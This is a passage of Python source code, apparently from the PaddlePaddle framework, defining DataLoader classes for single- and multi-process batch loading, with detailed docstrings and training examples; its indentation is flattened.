if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
    DataLoader provides an iterator which iterates the given dataset
    once by the batch_sampler.
    DataLoader supports single-process and multi-process data loading;
    multi-process workers will be used to load data asynchronously if
    :attr:`num_workers` is set as a positive number.
    DataLoader currently only supports map-style datasets (a sample can be
    fetched from the dataset with a given index); for map-style datasets,
    please see :code:`paddle.io.Dataset`.
    For batch_sampler, please see :code:`paddle.io.BatchSampler`.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`fluid.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> LoDTensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(LoDTensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
        shuffle(bool): whether to shuffle the indices order before generating
            batch indices, a substitution parameter for :attr:`batch_sampler`,
            see :attr:`batch_size`. Default False.
        drop_last(bool): whether to drop the last incomplete batch when the
            dataset size is not divisible by the batch size, a substitution
            parameter for :attr:`batch_sampler`, see :attr:`batch_size`. Default False.
        collate_fn(callable): function to generate mini-batch data by merging
            the sample list, None for only stacking each field of the samples
            in axis 0 (same as :code:`np.stack(..., axis=0)`). Default None.
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
        use_buffer_reader (bool): whether to use buffered reader.
            If use_buffer_reader=True, the DataLoader would prefetch next
            batch data asynchronously, so it would speed up data feeding
            and occupy a little more CPU or GPU memory, i.e., the memory
            of one batch input data. Default True.
        use_shared_memory (bool): whether to use shared memory to speed up
            putting data into the inter-process queue, set :attr:`use_shared_memory`
            as True only when the shared memory space on your machine (e.g.
            the space of '/dev/shm' on Linux operating systems) is large enough.
            Shared memory will only be enabled in multi-process mode (num_workers
            > 0). Default True.
        timeout(int): the timeout value for getting data from the output queue
            of subprocesses. Default 0.
        worker_init_fn(callable): init function which will be called with
            worker id on each subprocess starting if not set as None. Default
            None.
Returns:
        DataLoader: an iterable object for data iterating, each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.fluid as fluid
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether use GPU to run model
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
# get places
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
# --------------------- dygraph mode --------------------
class SimpleNet(fluid.dygraph.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = fluid.dygraph.nn.Linear(IMAGE_SIZE, CLASS_NUM, act='softmax')
def forward(self, image, label=None):
return self.fc(image)
with fluid.dygraph.guard(places[0]):
simple_net = SimpleNet()
opt = fluid.optimizer.SGD(learning_rate=1e-3,
parameter_list=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = fluid.layers.cross_entropy(out, label)
avg_loss = fluid.layers.reduce_mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
# -------------------------------------------------------
# -------------------- static graph ---------------------
paddle.enable_static()
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM, act='softmax')
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
image = fluid.data(name='image', shape=[None, IMAGE_SIZE], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
loss = simple_net(image, label)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
loader = DataLoader(dataset,
feed_list=[image, label],
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, data in enumerate(loader()):
l = exe.run(prog, feed=data, fetch_list=[loss], return_numpy=True)
print("Epoch {} batch {}: loss = {}".format(e, i, l[0][0]))
# -------------------------------------------------------
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert isinstance(batch_sampler, BatchSampler), \
"batch_sampler should be None or subclass instance " \
"of paddle.io.BatchSampler"
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
else:
assert batch_size is not None and batch_size > 0, \
"batch_size should be a positive value when " \
"batch_sampler is not given"
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data will be prefetched by a Python thread and pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which can be iterated over with a for loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process. This mode is designed to be compatible with the
:code:`fluid.layers.py_reader` interface. Users can migrate the codes
from :code:`fluid.layers.py_reader` to :code:`fluid.io.DataLoader`
easily when using iterable=False.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variable. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter can
only be used in dygraph mode. In static graph mode, this
parameter has no effect regardless of whether it is set.
The default value is False.
drop_last (bool): whether to drop the last batches whose count is
less than the number of CPU cores/GPU cards. The default value is
True. In the training phase, users should not set drop_last=False,
because every CPU core/GPU card must read data from the DataLoader.
In the inference phase, users can set drop_last=False, so that the
last batches whose count is less than the number of CPU cores/GPU
cards can still be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM)
cross_entropy = fluid.layers.softmax_with_cross_entropy(fc_tmp, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yields a list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except fluid.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = fluid.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same as the number of devices.
# - If you are using GPU, call `fluid.cuda_places()` to get all GPU places.
# - If you are using CPU, call `fluid.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
set_data_source(loader, places)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
'''
Users can use return_list = True in dygraph mode.
'''
with fluid.dygraph.guard(places[0]):
loader = fluid.io.DataLoader.from_generator(capacity=2, return_list=True)
set_data_source(loader, places[0])
for image, label in loader():
relu = fluid.layers.relu(image)
assert image.shape == [BATCH_SIZE, 784]
assert label.shape == [BATCH_SIZE, 1]
assert relu.shape == [BATCH_SIZE, 784]
Examples 2:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
# The data source has only 3 batches, which cannot be
# divided evenly across the CPU cores
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = fluid.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = fluid.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, fluid.cpu_places())
exe = fluid.Executor(fluid.CPUPlace())
prog = fluid.CompiledProgram(fluid.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
Create an iterable DataLoader object for loading data from Dataset.
Dataset is currently only supported on Linux systems.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
dataset = fluid.DatasetFactory().create_dataset("QueueDataset")
dataset.set_batch_size(32)
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
dataset.set_use_var([image, label])
dataset.set_pipe_command('cat')
loader = fluid.io.DataLoader.from_dataset(dataset, fluid.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader used in dygraph mode.
Most functions of the multiprocess dygraph GeneratorLoader differ from the
static graph GeneratorLoader, so it is implemented separately to keep the code readable.
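A minimal, illustrative sketch (assuming dygraph mode; the generator and
BATCH_SIZE below are placeholders): this loader is normally obtained through
:code:`fluid.io.DataLoader.from_generator` rather than constructed directly.
.. code-block:: python
    import numpy as np
    import paddle.fluid as fluid
    BATCH_SIZE = 8  # illustrative value
    def batch_generator():
        # Yield a few random (image, label) batches; shapes are placeholders.
        for _ in range(4):
            yield np.random.rand(BATCH_SIZE, 784).astype('float32'), \
                  np.random.randint(0, 10, (BATCH_SIZE, 1)).astype('int64')
    with fluid.dygraph.guard():
        loader = fluid.io.DataLoader.from_generator(capacity=4, return_list=True)
        loader.set_batch_generator(batch_generator, places=fluid.CPUPlace())
        for image, label in loader():
            pass  # image/label arrive as tensors on the configured place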
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. If the child process dies due to a bus error/segfault
# or simply hangs, the main process will hang waiting for data, so we need to handle
# SIGSEGV and SIGBUS of the child process here; 2. If the main process ends before the
# child process, it shuts all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so we also need to handle SIGTERM here.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in the queue is corrupted (e.g., due to
# Queue.cancel_join_thread or an unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failing quickly ] Here, QUEUE_GET_TIMEOUT is set relatively
# long, currently 60 seconds, because in some models, if the reader child
# process starts with a heavy burden, it does not have enough time to put
# data in the queue before the main process starts trying to get data from
# the queue. In that case, the child thread needs to wait slightly longer.
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE: [ avoid hanging ] After adding the shared memory mechanism, not only
# the queue.Empty exception can occur here, but other exceptions as well,
# such as an mmap failure. If it is not handled here, the thread will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
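# Transpose each batch: the incoming reader yields a list of samples, where each
# sample is a sequence of fields; rearrange it into "slots", one list per field
# holding that field's values for every sample in the batch.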
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread to None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
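# Build the non-iterable reader: collect shape/dtype/LoD metadata for every feed
# variable, create a LoDTensorBlockingQueue variable, append a 'create_py_reader'
# op (to the main program when keep_order is set, otherwise to the startup
# program), optionally wrap the reader with double_buffer, and finally append a
# 'read' op that feeds self._feed_list.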
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
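# If any feed variable carries LoD (variable-length) data, batching has to go
# through the sample-list path (paddle.batch); otherwise samples can be packed
# directly into batched CPU tensors by BatchedTensorProvider.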
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
